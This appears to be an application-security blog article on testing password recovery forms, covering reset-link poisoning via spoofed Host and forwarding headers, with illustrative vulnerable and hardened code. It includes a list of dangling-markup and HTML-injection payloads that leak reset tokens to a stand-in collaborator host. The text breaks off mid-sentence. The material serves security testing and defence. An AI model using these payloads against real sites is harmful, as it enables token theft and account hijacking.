
AppSec Tales III | Password Recovery

Karol Mazurek
7 min read · Apr 24, 2022

Guidelines for application security testing of password recovery forms.

INTRODUCTION

This article describes application security testing of password recovery forms, so that the recovery flow does not become the weak point of an otherwise secure authentication process.
The advice in this article is based on:

  • OWASP Web Security Testing Guide
  • OWASP Application Security Verification Standard
  • NIST recommendations
  • bug bounty reports
  • my own experience.

I will provide a short test sample, a potential impact or an attack scenario, and a possible solution to the problem at each point.

GUIDELINES

I. PASSWORD RECOVERY LINK POISONING

Poison the domain part of the password recovery link, for example by sending the reset request with a spoofed Host header or forwarding header and checking which domain the generated link points at.

  • This can let an attacker hijack the account of a victim who clicks the poisoned password recovery link: the link, reset token included, points at a host the attacker controls, so the token is delivered to the attacker as soon as the victim follows it.
Source: Own study — The testing flow of password reset poisoning (fuzzing wordlist).
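The following is an added example, not code from the article, showing the mechanism the test flow above looks for: a reset-link builder that derives the link's domain from request headers, the hardened builder that uses only a configured origin, and the fuzzing loop a tester runs over a header wordlist. The origin app.example, the /reset route, the header wordlist and the collaborator host domain_collab are assumptions constructed for illustration.

```python
"""Password reset link poisoning: a link builder that trusts request
headers, a hardened one that does not, and the fuzzing loop a tester uses
to tell them apart.

Added example, not code from the article. The application origin, the
/reset route, the header wordlist and the collaborator host are assumptions
constructed for illustration.
"""
from urllib.parse import urlencode, urlsplit

# Assumption: the public origin comes from configuration. It is the only value
# ever used to build links that are mailed to users.
CANONICAL_ORIGIN = "https://app.example"
CANONICAL_HOST = urlsplit(CANONICAL_ORIGIN).hostname

# Constructed wordlist: header sets a tester sends with a reset request for
# the victim's address. "domain_collab" stands in for the attacker's server.
COLLABORATOR = "domain_collab"
SPOOFING_HEADERS = [
    {"Host": COLLABORATOR},
    {"Host": CANONICAL_HOST, "X-Forwarded-Host": COLLABORATOR},
    {"Host": CANONICAL_HOST, "X-Host": COLLABORATOR},
]


def build_reset_link_vulnerable(headers: dict, token: str) -> str:
    """Vulnerable: derives the link's origin from the request.

    Whatever the forwarding header or the Host header says becomes the
    domain of the link, so the victim's browser carries the token there.
    """
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    scheme = headers.get("X-Forwarded-Proto", "https")
    return f"{scheme}://{host}/reset?{urlencode({'token': token})}"


def build_reset_link_hardened(headers: dict, token: str) -> str:
    """Hardened: validates Host against an allow-list, builds the link from
    configuration only, and ignores every forwarding header."""
    host = headers.get("Host", "").split(":", 1)[0].lower()
    if host != CANONICAL_HOST:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}"


def link_poisoned(link: str, collaborator: str = COLLABORATOR) -> bool:
    """Tester's check: does the generated link point at the collaborator?"""
    return urlsplit(link).hostname == collaborator


def fuzz(builder, wordlist=SPOOFING_HEADERS, token: str = "t0k3n") -> list:
    """Run every header set through `builder` and return the ones that yield
    a poisoned link. A builder that rejects the request (raises) counts as
    not poisoned for that entry."""
    hits = []
    for headers in wordlist:
        try:
            link = builder(headers, token)
        except ValueError:
            continue
        if link_poisoned(link):
            hits.append(headers)
    return hits


if __name__ == "__main__":
    for name, builder in [("vulnerable", build_reset_link_vulnerable),
                          ("hardened", build_reset_link_hardened)]:
        print(f"{name}: poisoned by {fuzz(builder)}")
```

The vulnerable builder is poisoned by the Host entry and the X-Forwarded-Host entry but not by X-Host, which is the point of running a wordlist rather than a single header: it tells you which header the application actually trusts. The hardened builder never emits a poisoned link, and it rejects a request whose Host is not on the allow-list instead of guessing.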

DANGLING MARKUPS PAYLOADS

"><img src='//domain_collab? 
"><img src='http://domain_collab/log.php?HTML=
"><meta http-equiv="refresh" content='0; url=http://domain_collab/log.php?text=
"><meta http-equiv="refresh" content='0;URL=file://domain_collab?a=
"><table background='//domain_collab?'
"><base href='http://domain_collab/'>
"><button name=xss type=submit formaction='https://domain_collab'>I get consumed!
"><input type='hidden' name='review_body' value="
"><form action=http://domain_collab><input type="submit">Click Me</input><select name=xss><option
"><noscript><form action=http://domain_collab><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
"><script src='/search?q=a&call=alert(1)'></script>
"><html><head></head><body><script>top.window.location = "https://domain_collab/hacked.html"</script></body></html>
"><portal src='https://domain_collab?
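The payloads above all work the same way: they close the attribute and tag the input lands in, then open an element whose attribute value is never closed, so the browser swallows everything up to the next matching quote, reset link and token included, and sends it to the collaborator. The following added example (not code from the article) models that tokenizer rule for the first payload in the list and shows the reflecting template beside its escaped form. The page template, the reflected user field, the token value and the logout link are constructed for illustration.

```python
"""Dangling markup in a password recovery page: what the browser sends to
the collaborator when user input is reflected unescaped into an attribute,
and the output escaping that makes the payload inert.

Added example, not code from the article. The page template, the reflected
"user" field, the token and the logout link are constructed for illustration;
the tokenizer below is a minimal model of one browser rule, not a browser.
"""
import html
import re
from typing import List, Optional

# Constructed page: the recovery page reflects the submitted username into a
# value attribute and, further down, renders the reset link with its token.
# The single quote in the logout link is what the dangling payload runs into.
TEMPLATE = (
    '<input type="text" name="user" value="{user}">\n'
    '<a href="https://app.example/reset?token={token}">Reset password</a>\n'
    "<a href='/logout'>Log out</a>\n"
)

# First payload from the list above: close the attribute and the tag, then
# open an <img> whose src attribute the payload itself never closes.
PAYLOAD = "\"><img src='//domain_collab?"


def render_vulnerable(user: str, token: str) -> str:
    """Reflects the input verbatim into the attribute."""
    return TEMPLATE.format(user=user, token=token)


def render_hardened(user: str, token: str) -> str:
    """Escapes <, >, & and both quote characters before reflecting."""
    return TEMPLATE.format(user=html.escape(user, quote=True), token=token)


def img_requests(page: str) -> List[str]:
    """Model of the tokenizer's single-quoted attribute value state for
    <img src='...'>: the value runs to the next single quote, whatever markup
    lies in between. Returns the URLs such <img> elements would fetch."""
    return [m.group(1)
            for m in re.finditer(r"<img\s+src='([^']*)'", page, re.S)]


def leaked_token(page: str) -> Optional[str]:
    """Tester's check: does any <img> request carry the reset token?"""
    for url in img_requests(page):
        m = re.search(r"token=([A-Za-z0-9_-]+)", url)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    print("vulnerable leaks:", leaked_token(render_vulnerable(PAYLOAD, "s3cr3t")))
    print("hardened leaks:  ", leaked_token(render_hardened(PAYLOAD, "s3cr3t")))
```

With the vulnerable template the captured src value is everything from `//domain_collab?` to the quote in the logout link, so the reset link and its token travel to the collaborator in the query string of an image request, no script execution required. With `html.escape(..., quote=True)` the reflected `<`, `>`, `"` and `'` are entity-encoded, no new element is opened, and nothing is requested. The same context-correct escaping defuses the `<base>`, `<meta refresh>` and `<form action>` variants in the list, since each of them depends on a raw `<` reaching the page.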

SPOOFING HEADERS WORDLIST

Avoid using the Host header altogether in…
